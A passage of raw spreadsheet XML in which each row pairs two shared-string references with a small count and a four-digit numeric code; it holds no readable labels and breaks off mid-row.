    <row r="22485" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22485" t="s">
        <v>16231</v>
      </c>
      <c r="B22485" t="s">
        <v>16216</v>
      </c>
      <c r="C22485">
        <v>3</v>
      </c>
      <c r="D22485">
        <v>2324</v>
      </c>
    </row>
    <row r="22486" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22486" t="s">
        <v>16228</v>
      </c>
      <c r="B22486" t="s">
        <v>16217</v>
      </c>
      <c r="C22486">
        <v>5</v>
      </c>
      <c r="D22486">
        <v>2324</v>
      </c>
    </row>
    <row r="22487" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22487" t="s">
        <v>16231</v>
      </c>
      <c r="B22487" t="s">
        <v>16218</v>
      </c>
      <c r="C22487">
        <v>5</v>
      </c>
      <c r="D22487">
        <v>2324</v>
      </c>
    </row>
    <row r="22488" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22488" t="s">
        <v>16229</v>
      </c>
      <c r="B22488" t="s">
        <v>16219</v>
      </c>
      <c r="C22488">
        <v>0</v>
      </c>
      <c r="D22488">
        <v>2324</v>
      </c>
    </row>
    <row r="22489" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22489" t="s">
        <v>16230</v>
      </c>
      <c r="B22489" t="s">
        <v>16220</v>
      </c>
      <c r="C22489">
        <v>0</v>
      </c>
      <c r="D22489">
        <v>2324</v>
      </c>
    </row>
    <row r="22490" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22490" t="s">
        <v>16229</v>
      </c>
      <c r="B22490" t="s">
        <v>16221</v>
      </c>
      <c r="C22490">
        <v>5</v>
      </c>
      <c r="D22490">
        <v>2324</v>
      </c>
    </row>
    <row r="22491" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22491" t="s">
        <v>16230</v>
      </c>
      <c r="B22491" t="s">
        <v>16222</v>
      </c>
      <c r="C22491">
        <v>5</v>
      </c>
      <c r="D22491">
        <v>2324</v>
      </c>
    </row>
    <row r="22492" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22492" t="s">
        <v>16223</v>
      </c>
      <c r="B22492" t="s">
        <v>16223</v>
      </c>
      <c r="C22492">
        <v>25</v>
      </c>
      <c r="D22492">
        <v>2324</v>
      </c>
    </row>
    <row r="22493" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22493" t="s">
        <v>16224</v>
      </c>
      <c r="B22493" t="s">
        <v>16224</v>
      </c>
      <c r="C22493">
        <v>2</v>
      </c>
      <c r="D22493">
        <v>2324</v>
      </c>
    </row>
    <row r="22494" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22494" t="s">
        <v>16228</v>
      </c>
      <c r="B22494" t="s">
        <v>16211</v>
      </c>
      <c r="C22494">
        <v>0</v>
      </c>
      <c r="D22494">
        <v>5821</v>
      </c>
    </row>
    <row r="22495" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22495" t="s">
        <v>16231</v>
      </c>
      <c r="B22495" t="s">
        <v>16212</v>
      </c>
      <c r="C22495">
        <v>0</v>
      </c>
      <c r="D22495">
        <v>5821</v>
      </c>
    </row>
    <row r="22496" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22496" t="s">
        <v>16228</v>
      </c>
      <c r="B22496" t="s">
        <v>16213</v>
      </c>
      <c r="C22496">
        <v>0</v>
      </c>
      <c r="D22496">
        <v>5821</v>
      </c>
    </row>
    <row r="22497" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22497" t="s">
        <v>16231</v>
      </c>
      <c r="B22497" t="s">
        <v>16214</v>
      </c>
      <c r="C22497">
        <v>0</v>
      </c>
      <c r="D22497">
        <v>5821</v>
      </c>
    </row>
    <row r="22498" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22498" t="s">
        <v>16228</v>
      </c>
      <c r="B22498" t="s">
        <v>16215</v>
      </c>
      <c r="C22498">
        <v>5</v>
      </c>
      <c r="D22498">
        <v>5821</v>
      </c>
    </row>
    <row r="22499" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22499" t="s">
        <v>16231</v>
      </c>
      <c r="B22499" t="s">
        <v>16216</v>
      </c>
      <c r="C22499">
        <v>8</v>
      </c>
      <c r="D22499">
        <v>5821</v>
      </c>
    </row>
    <row r="22500" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22500" t="s">
        <v>16228</v>
      </c>
      <c r="B22500" t="s">
        <v>16217</v>
      </c>
      <c r="C22500">
        <v>65</v>
      </c>
      <c r="D22500">
        <v>5821</v>
      </c>
    </row>
    <row r="22501" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22501" t="s">
        <v>16231</v>
      </c>
      <c r="B22501" t="s">
        <v>16218</v>
      </c>
      <c r="C22501">
        <v>0</v>
      </c>
      <c r="D22501">
        <v>5821</v>
      </c>
    </row>
    <row r="22502" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22502" t="s">
        <v>16229</v>
      </c>
      <c r="B22502" t="s">
        <v>16219</v>
      </c>
      <c r="C22502">
        <v>0</v>
      </c>
      <c r="D22502">
        <v>5821</v>
      </c>
    </row>
    <row r="22503" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22503" t="s">
        <v>16230</v>
      </c>
      <c r="B22503" t="s">
        <v>16220</v>
      </c>
      <c r="C22503">
        <v>0</v>
      </c>
      <c r="D22503">
        <v>5821</v>
      </c>
    </row>
    <row r="22504" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22504" t="s">
        <v>16229</v>
      </c>
      <c r="B22504" t="s">
        <v>16221</v>
      </c>
      <c r="C22504">
        <v>35</v>
      </c>
      <c r="D22504">
        <v>5821</v>
      </c>
    </row>
    <row r="22505" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22505" t="s">
        <v>16230</v>
      </c>
      <c r="B22505" t="s">
        <v>16222</v>
      </c>
      <c r="C22505">
        <v>0</v>
      </c>
      <c r="D22505">
        <v>5821</v>
      </c>
    </row>
    <row r="22506" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22506" t="s">
        <v>16223</v>
      </c>
      <c r="B22506" t="s">
        <v>16223</v>
      </c>
      <c r="C22506">
        <v>0</v>
      </c>
      <c r="D22506">
        <v>5821</v>
      </c>
    </row>
    <row r="22507" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22507" t="s">
        <v>16224</v>
      </c>
      <c r="B22507" t="s">
        <v>16224</v>
      </c>
      <c r="C22507">
        <v>0</v>
      </c>
      <c r="D22507">
        <v>5821</v>
      </c>
    </row>
    <row r="22508" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22508" t="s">
        <v>16228</v>
      </c>
      <c r="B22508" t="s">
        <v>16217</v>
      </c>
      <c r="C22508">
        <v>40</v>
      </c>
      <c r="D22508">
        <v>5821</v>
      </c>
    </row>
    <row r="22509" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22509" t="s">
        <v>16228</v>
      </c>
      <c r="B22509" t="s">
        <v>16211</v>
      </c>
      <c r="C22509">
        <v>0</v>
      </c>
      <c r="D22509">
        <v>5060</v>
      </c>
    </row>
    <row r="22510" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22510" t="s">
        <v>16231</v>
      </c>
      <c r="B22510" t="s">
        <v>16212</v>
      </c>
      <c r="C22510">
        <v>0</v>
      </c>
      <c r="D22510">
        <v>5060</v>
      </c>
    </row>
    <row r="22511" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22511" t="s">
        <v>16228</v>
      </c>
      <c r="B22511" t="s">
        <v>16213</v>
      </c>
      <c r="C22511">
        <v>0</v>
      </c>
      <c r="D22511">
        <v>5060</v>
      </c>
    </row>
    <row r="22512" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22512" t="s">
        <v>16231</v>
      </c>
      <c r="B22512" t="s">
        <v>16214</v>
      </c>
      <c r="C22512">
        <v>0</v>
      </c>
      <c r="D22512">
        <v>5060</v>
      </c>
    </row>
    <row r="22513" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22513" t="s">
        <v>16228</v>
      </c>
      <c r="B22513" t="s">
        <v>16215</v>
      </c>
      <c r="C22513">
        <v>2</v>
      </c>
      <c r="D22513">
        <v>5060</v>
      </c>
    </row>
    <row r="22514" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22514" t="s">
        <v>16231</v>
      </c>
      <c r="B22514" t="s">
        <v>16216</v>
      </c>
      <c r="C22514">
        <v>0</v>
      </c>
      <c r="D22514">
        <v>5060</v>
      </c>
    </row>
    <row r="22515" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22515" t="s">
        <v>16228</v>
      </c>
      <c r="B22515" t="s">
        <v>16217</v>
      </c>
      <c r="C22515">
        <v>1</v>
      </c>
      <c r="D22515">
        <v>5060</v>
      </c>
    </row>
    <row r="22516" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22516" t="s">
        <v>16231</v>
      </c>
      <c r="B22516" t="s">
        <v>16218</v>
      </c>
      <c r="C22516">
        <v>1</v>
      </c>
      <c r="D22516">
        <v>5060</v>
      </c>
    </row>
    <row r="22517" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22517" t="s">
        <v>16229</v>
      </c>
      <c r="B22517" t="s">
        <v>16219</v>
      </c>
      <c r="C22517">
        <v>0</v>
      </c>
      <c r="D22517">
        <v>5060</v>
      </c>
    </row>
    <row r="22518" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22518" t="s">
        <v>16230</v>
      </c>
      <c r="B22518" t="s">
        <v>16220</v>
      </c>
      <c r="C22518">
        <v>0</v>
      </c>
      <c r="D22518">
        <v>5060</v>
      </c>
    </row>
    <row r="22519" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22519" t="s">
        <v>16229</v>
      </c>
      <c r="B22519" t="s">
        <v>16221</v>
      </c>
      <c r="C22519">
        <v>7</v>
      </c>
      <c r="D22519">
        <v>5060</v>
      </c>
    </row>
    <row r="22520" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22520" t="s">
        <v>16230</v>
      </c>
      <c r="B22520" t="s">
        <v>16222</v>
      </c>
      <c r="C22520">
        <v>0</v>
      </c>
      <c r="D22520">
        <v>5060</v>
      </c>
    </row>
    <row r="22521" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22521" t="s">
        <v>16223</v>
      </c>
      <c r="B22521" t="s">
        <v>16223</v>
      </c>
      <c r="C22521">
        <v>0</v>
      </c>
      <c r="D22521">
        <v>5060</v>
      </c>
    </row>
    <row r="22522" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22522" t="s">
        <v>16224</v>
      </c>
      <c r="B22522" t="s">
        <v>16224</v>
      </c>
      <c r="C22522">
        <v>0</v>
      </c>
      <c r="D22522">
        <v>5060</v>
      </c>
    </row>
    <row r="22523" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22523" t="s">
        <v>16228</v>
      </c>
      <c r="B22523" t="s">
        <v>16211</v>
      </c>
      <c r="C22523">
        <v>0</v>
      </c>
      <c r="D22523">
        <v>2120</v>
      </c>
    </row>
    <row r="22524" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22524" t="s">
        <v>16231</v>
      </c>
      <c r="B22524" t="s">
        <v>16212</v>
      </c>
      <c r="C22524">
        <v>0</v>
      </c>
      <c r="D22524">
        <v>2120</v>
      </c>
    </row>
    <row r="22525" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22525" t="s">
        <v>16228</v>
      </c>
      <c r="B22525" t="s">
        <v>16213</v>
      </c>
      <c r="C22525">
        <v>0</v>
      </c>
      <c r="D22525">
        <v>2120</v>
      </c>
    </row>
    <row r="22526" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22526" t="s">
        <v>16231</v>
      </c>
      <c r="B22526" t="s">
        <v>16214</v>
      </c>
      <c r="C22526">
        <v>0</v>
      </c>
      <c r="D22526">
        <v>2120</v>
      </c>
    </row>
    <row r="22527" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22527" t="s">
        <v>16228</v>
      </c>
      <c r="B22527" t="s">
        <v>16215</v>
      </c>
      <c r="C22527">
        <v>0</v>
      </c>
      <c r="D22527">
        <v>2120</v>
      </c>
    </row>
    <row r="22528" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22528" t="s">
        <v>16231</v>
      </c>
      <c r="B22528" t="s">
        <v>16216</v>
      </c>
      <c r="C22528">
        <v>1</v>
      </c>
      <c r="D22528">
        <v>2120</v>
      </c>
    </row>
    <row r="22529" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22529" t="s">
        <v>16228</v>
      </c>
      <c r="B22529" t="s">
        <v>16217</v>
      </c>
      <c r="C22529">
        <v>4</v>
      </c>
      <c r="D22529">
        <v>2120</v>
      </c>
    </row>
    <row r="22530" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22530" t="s">
        <v>16231</v>
      </c>
      <c r="B22530" t="s">
        <v>16218</v>
      </c>
      <c r="C22530">
        <v>4</v>
      </c>
      <c r="D22530">
        <v>2120</v>
      </c>
    </row>
    <row r="22531" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22531" t="s">
        <v>16229</v>
      </c>
      <c r="B22531" t="s">
        <v>16219</v>
      </c>
      <c r="C22531">
        <v>0</v>
      </c>
      <c r="D22531">
        <v>2120</v>
      </c>
    </row>
    <row r="22532" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22532" t="s">
        <v>16230</v>
      </c>
      <c r="B22532" t="s">
        <v>16220</v>
      </c>
      <c r="C22532">
        <v>0</v>
      </c>
      <c r="D22532">
        <v>2120</v>
      </c>
    </row>
    <row r="22533" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22533" t="s">
        <v>16229</v>
      </c>
      <c r="B22533" t="s">
        <v>16221</v>
      </c>
      <c r="C22533">
        <v>3</v>
      </c>
      <c r="D22533">
        <v>2120</v>
      </c>
    </row>
    <row r="22534" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22534" t="s">
        <v>16230</v>
      </c>
      <c r="B22534" t="s">
        <v>16222</v>
      </c>
      <c r="C22534">
        <v>2</v>
      </c>
      <c r="D22534">
        <v>2120</v>
      </c>
    </row>
    <row r="22535" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22535" t="s">
        <v>16223</v>
      </c>
      <c r="B22535" t="s">
        <v>16223</v>
      </c>
      <c r="C22535">
        <v>20</v>
      </c>
      <c r="D22535">
        <v>2120</v>
      </c>
    </row>
    <row r="22536" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22536" t="s">
        <v>16224</v>
      </c>
      <c r="B22536" t="s">
        <v>16224</v>
      </c>
      <c r="C22536">
        <v>0</v>
      </c>
      <c r="D22536">
        <v>2120</v>
      </c>
    </row>
    <row r="22537" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22537" t="s">
        <v>16228</v>
      </c>
      <c r="B22537" t="s">
        <v>16215</v>
      </c>
      <c r="C22537">
        <v>1</v>
      </c>
      <c r="D22537">
        <v>4816</v>
      </c>
    </row>
    <row r="22538" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22538" t="s">
        <v>16228</v>
      </c>
      <c r="B22538" t="s">
        <v>16217</v>
      </c>
      <c r="C22538">
        <v>0</v>
      </c>
      <c r="D22538">
        <v>4816</v>
      </c>
    </row>
    <row r="22539" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22539" t="s">
        <v>16231</v>
      </c>
      <c r="B22539" t="s">
        <v>16218</v>
      </c>
      <c r="C22539">
        <v>0</v>
      </c>
      <c r="D22539">
        <v>4816</v>
      </c>
    </row>
    <row r="22540" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22540" t="s">
        <v>16223</v>
      </c>
      <c r="B22540" t="s">
        <v>16223</v>
      </c>
      <c r="C22540">
        <v>5</v>
      </c>
      <c r="D22540">
        <v>4816</v>
      </c>
    </row>
    <row r="22541" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22541" t="s">
        <v>16228</v>
      </c>
      <c r="B22541" t="s">
        <v>16211</v>
      </c>
      <c r="C22541">
        <v>0</v>
      </c>
      <c r="D22541">
        <v>5223</v>
      </c>
    </row>
    <row r="22542" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22542" t="s">
        <v>16231</v>
      </c>
      <c r="B22542" t="s">
        <v>16212</v>
      </c>
      <c r="C22542">
        <v>0</v>
      </c>
      <c r="D22542">
        <v>5223</v>
      </c>
    </row>
    <row r="22543" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22543" t="s">
        <v>16228</v>
      </c>
      <c r="B22543" t="s">
        <v>16213</v>
      </c>
      <c r="C22543">
        <v>0</v>
      </c>
      <c r="D22543">
        <v>5223</v>
      </c>
    </row>
    <row r="22544" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22544" t="s">
        <v>16231</v>
      </c>
      <c r="B22544" t="s">
        <v>16214</v>
      </c>
      <c r="C22544">
        <v>0</v>
      </c>
      <c r="D22544">
        <v>5223</v>
      </c>
    </row>
    <row r="22545" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22545" t="s">
        <v>16228</v>
      </c>
      <c r="B22545" t="s">
        <v>16215</v>
      </c>
      <c r="C22545">
        <v>0</v>
      </c>
      <c r="D22545">
        <v>5223</v>
      </c>
    </row>
    <row r="22546" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22546" t="s">
        <v>16231</v>
      </c>
      <c r="B22546" t="s">
        <v>16216</v>
      </c>
      <c r="C22546">
        <v>0</v>
      </c>
      <c r="D22546">
        <v>5223</v>
      </c>
    </row>
    <row r="22547" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22547" t="s">
        <v>16228</v>
      </c>
      <c r="B22547" t="s">
        <v>16217</v>
      </c>
      <c r="C22547">
        <v>0</v>
      </c>
      <c r="D22547">
        <v>5223</v>
      </c>
    </row>
    <row r="22548" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22548" t="s">
        <v>16231</v>
      </c>
      <c r="B22548" t="s">
        <v>16218</v>
      </c>
      <c r="C22548">
        <v>0</v>
      </c>
      <c r="D22548">
        <v>5223</v>
      </c>
    </row>
    <row r="22549" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22549" t="s">
        <v>16229</v>
      </c>
      <c r="B22549" t="s">
        <v>16219</v>
      </c>
      <c r="C22549">
        <v>0</v>
      </c>
      <c r="D22549">
        <v>5223</v>
      </c>
    </row>
    <row r="22550" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22550" t="s">
        <v>16230</v>
      </c>
      <c r="B22550" t="s">
        <v>16220</v>
      </c>
      <c r="C22550">
        <v>0</v>
      </c>
      <c r="D22550">
        <v>5223</v>
      </c>
    </row>
    <row r="22551" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22551" t="s">
        <v>16229</v>
      </c>
      <c r="B22551" t="s">
        <v>16221</v>
      </c>
      <c r="C22551">
        <v>0</v>
      </c>
      <c r="D22551">
        <v>5223</v>
      </c>
    </row>
    <row r="22552" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22552" t="s">
        <v>16230</v>
      </c>
      <c r="B22552" t="s">
        <v>16222</v>
      </c>
      <c r="C22552">
        <v>0</v>
      </c>
      <c r="D22552">
        <v>5223</v>
      </c>
    </row>
    <row r="22553" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22553" t="s">
        <v>16223</v>
      </c>
      <c r="B22553" t="s">
        <v>16223</v>
      </c>
      <c r="C22553">
        <v>0</v>
      </c>
      <c r="D22553">
        <v>5223</v>
      </c>
    </row>
    <row r="22554" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22554" t="s">
        <v>16224</v>
      </c>
      <c r="B22554" t="s">
        <v>16224</v>
      </c>
      <c r="C22554">
        <v>0</v>
      </c>
      <c r="D22554">
        <v>5223</v>
      </c>
    </row>
    <row r="22555" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22555" t="s">
        <v>16231</v>
      </c>
      <c r="B22555" t="s">
        <v>16216</v>
      </c>
      <c r="C22555">
        <v>1</v>
      </c>
      <c r="D22555">
        <v>5223</v>
      </c>
    </row>
    <row r="22556" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22556" t="s">
        <v>16229</v>
      </c>
      <c r="B22556" t="s">
        <v>16221</v>
      </c>
      <c r="C22556">
        <v>6</v>
      </c>
      <c r="D22556">
        <v>5223</v>
      </c>
    </row>
    <row r="22557" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22557" t="s">
        <v>16223</v>
      </c>
      <c r="B22557" t="s">
        <v>16223</v>
      </c>
      <c r="C22557">
        <v>6</v>
      </c>
      <c r="D22557">
        <v>5223</v>
      </c>
    </row>
    <row r="22558" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22558" t="s">
        <v>16229</v>
      </c>
      <c r="B22558" t="s">
        <v>16221</v>
      </c>
      <c r="C22558">
        <v>5</v>
      </c>
      <c r="D22558">
        <v>4816</v>
      </c>
    </row>
    <row r="22559" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22559" t="s">
        <v>16230</v>
      </c>
      <c r="B22559" t="s">
        <v>16222</v>
      </c>
      <c r="C22559">
        <v>0</v>
      </c>
      <c r="D22559">
        <v>4816</v>
      </c>
    </row>
    <row r="22560" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22560" t="s">
        <v>16228</v>
      </c>
      <c r="B22560" t="s">
        <v>16211</v>
      </c>
      <c r="C22560">
        <v>0</v>
      </c>
      <c r="D22560">
        <v>5647</v>
      </c>
    </row>
    <row r="22561" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22561" t="s">
        <v>16231</v>
      </c>
      <c r="B22561" t="s">
        <v>16212</v>
      </c>
      <c r="C22561">
        <v>0</v>
      </c>
      <c r="D22561">
        <v>5647</v>
      </c>
    </row>
    <row r="22562" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22562" t="s">
        <v>16228</v>
      </c>
      <c r="B22562" t="s">
        <v>16213</v>
      </c>
      <c r="C22562">
        <v>0</v>
      </c>
      <c r="D22562">
        <v>5647</v>
      </c>
    </row>
    <row r="22563" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22563" t="s">
        <v>16231</v>
      </c>
      <c r="B22563" t="s">
        <v>16214</v>
      </c>
      <c r="C22563">
        <v>0</v>
      </c>
      <c r="D22563">
        <v>5647</v>
      </c>
    </row>
    <row r="22564" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22564" t="s">
        <v>16228</v>
      </c>
      <c r="B22564" t="s">
        <v>16215</v>
      </c>
      <c r="C22564">
        <v>0</v>
      </c>
      <c r="D22564">
        <v>5647</v>
      </c>
    </row>
    <row r="22565" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22565" t="s">
        <v>16231</v>
      </c>
      <c r="B22565" t="s">
        <v>16216</v>
      </c>
      <c r="C22565">
        <v>1</v>
      </c>
      <c r="D22565">
        <v>5647</v>
      </c>
    </row>
    <row r="22566" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22566" t="s">
        <v>16228</v>
      </c>
      <c r="B22566" t="s">
        <v>16217</v>
      </c>
      <c r="C22566">
        <v>0</v>
      </c>
      <c r="D22566">
        <v>5647</v>
      </c>
    </row>
    <row r="22567" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22567" t="s">
        <v>16231</v>
      </c>
      <c r="B22567" t="s">
        <v>16218</v>
      </c>
      <c r="C22567">
        <v>1</v>
      </c>
      <c r="D22567">
        <v>5647</v>
      </c>
    </row>
    <row r="22568" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22568" t="s">
        <v>16229</v>
      </c>
      <c r="B22568" t="s">
        <v>16219</v>
      </c>
      <c r="C22568">
        <v>0</v>
      </c>
      <c r="D22568">
        <v>5647</v>
      </c>
    </row>
    <row r="22569" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22569" t="s">
        <v>16230</v>
      </c>
      <c r="B22569" t="s">
        <v>16220</v>
      </c>
      <c r="C22569">
        <v>0</v>
      </c>
      <c r="D22569">
        <v>5647</v>
      </c>
    </row>
    <row r="22570" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22570" t="s">
        <v>16229</v>
      </c>
      <c r="B22570" t="s">
        <v>16221</v>
      </c>
      <c r="C22570">
        <v>0</v>
      </c>
      <c r="D22570">
        <v>5647</v>
      </c>
    </row>
    <row r="22571" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22571" t="s">
        <v>16230</v>
      </c>
      <c r="B22571" t="s">
        <v>16222</v>
      </c>
      <c r="C22571">
        <v>1</v>
      </c>
      <c r="D22571">
        <v>5647</v>
      </c>
    </row>
    <row r="22572" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22572" t="s">
        <v>16223</v>
      </c>
      <c r="B22572" t="s">
        <v>16223</v>
      </c>
      <c r="C22572">
        <v>6</v>
      </c>
      <c r="D22572">
        <v>5647</v>
      </c>
    </row>
    <row r="22573" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22573" t="s">
        <v>16224</v>
      </c>
      <c r="B22573" t="s">
        <v>16224</v>
      </c>
      <c r="C22573">
        <v>1</v>
      </c>
      <c r="D22573">
        <v>5647</v>
      </c>
    </row>
    <row r="22574" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22574" t="s">
        <v>16228</v>
      </c>
      <c r="B22574" t="s">
        <v>16211</v>
      </c>
      <c r="C22574">
        <v>0</v>
      </c>
      <c r="D22574">
        <v>5796</v>
      </c>
    </row>
    <row r="22575" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22575" t="s">
        <v>16231</v>
      </c>
      <c r="B22575" t="s">
        <v>16212</v>
      </c>
      <c r="C22575">
        <v>0</v>
      </c>
      <c r="D22575">
        <v>5796</v>
      </c>
    </row>
    <row r="22576" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22576" t="s">
        <v>16228</v>
      </c>
      <c r="B22576" t="s">
        <v>16213</v>
      </c>
      <c r="C22576">
        <v>0</v>
      </c>
      <c r="D22576">
        <v>5796</v>
      </c>
    </row>
    <row r="22577" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22577" t="s">
        <v>16231</v>
      </c>
      <c r="B22577" t="s">
        <v>16214</v>
      </c>
      <c r="C22577">
        <v>0</v>
      </c>
      <c r="D22577">
        <v>5796</v>
      </c>
    </row>
    <row r="22578" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22578" t="s">
        <v>16228</v>
      </c>
      <c r="B22578" t="s">
        <v>16215</v>
      </c>
      <c r="C22578">
        <v>2</v>
      </c>
      <c r="D22578">
        <v>5796</v>
      </c>
    </row>
    <row r="22579" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22579" t="s">
        <v>16231</v>
      </c>
      <c r="B22579" t="s">
        <v>16216</v>
      </c>
      <c r="C22579">
        <v>2</v>
      </c>
      <c r="D22579">
        <v>5796</v>
      </c>
    </row>
    <row r="22580" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22580" t="s">
        <v>16228</v>
      </c>
      <c r="B22580" t="s">
        <v>16217</v>
      </c>
      <c r="C22580">
        <v>8</v>
      </c>
      <c r="D22580">
        <v>5796</v>
      </c>
    </row>
    <row r="22581" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22581" t="s">
        <v>16231</v>
      </c>
      <c r="B22581" t="s">
        <v>16218</v>
      </c>
      <c r="C22581">
        <v>1</v>
      </c>
      <c r="D22581">
        <v>5796</v>
      </c>
    </row>
    <row r="22582" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22582" t="s">
        <v>16229</v>
      </c>
      <c r="B22582" t="s">
        <v>16219</v>
      </c>
      <c r="C22582">
        <v>1</v>
      </c>
      <c r="D22582">
        <v>5796</v>
      </c>
    </row>
    <row r="22583" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22583" t="s">
        <v>16230</v>
      </c>
      <c r="B22583" t="s">
        <v>16220</v>
      </c>
      <c r="C22583">
        <v>1</v>
      </c>
      <c r="D22583">
        <v>5796</v>
      </c>
    </row>
    <row r="22584" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22584" t="s">
        <v>16229</v>
      </c>
      <c r="B22584" t="s">
        <v>16221</v>
      </c>
      <c r="C22584">
        <v>0</v>
      </c>
      <c r="D22584">
        <v>5796</v>
      </c>
    </row>
    <row r="22585" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22585" t="s">
        <v>16230</v>
      </c>
      <c r="B22585" t="s">
        <v>16222</v>
      </c>
      <c r="C22585">
        <v>0</v>
      </c>
      <c r="D22585">
        <v>5796</v>
      </c>
    </row>
    <row r="22586" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22586" t="s">
        <v>16223</v>
      </c>
      <c r="B22586" t="s">
        <v>16223</v>
      </c>
      <c r="C22586">
        <v>20</v>
      </c>
      <c r="D22586">
        <v>5796</v>
      </c>
    </row>
    <row r="22587" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22587" t="s">
        <v>16224</v>
      </c>
      <c r="B22587" t="s">
        <v>16224</v>
      </c>
      <c r="C22587">
        <v>2</v>
      </c>
      <c r="D22587">
        <v>5796</v>
      </c>
    </row>
    <row r="22588" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22588" t="s">
        <v>16228</v>
      </c>
      <c r="B22588" t="s">
        <v>16211</v>
      </c>
      <c r="C22588">
        <v>0</v>
      </c>
      <c r="D22588">
        <v>1978</v>
      </c>
    </row>
    <row r="22589" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22589" t="s">
        <v>16231</v>
      </c>
      <c r="B22589" t="s">
        <v>16212</v>
      </c>
      <c r="C22589">
        <v>0</v>
      </c>
      <c r="D22589">
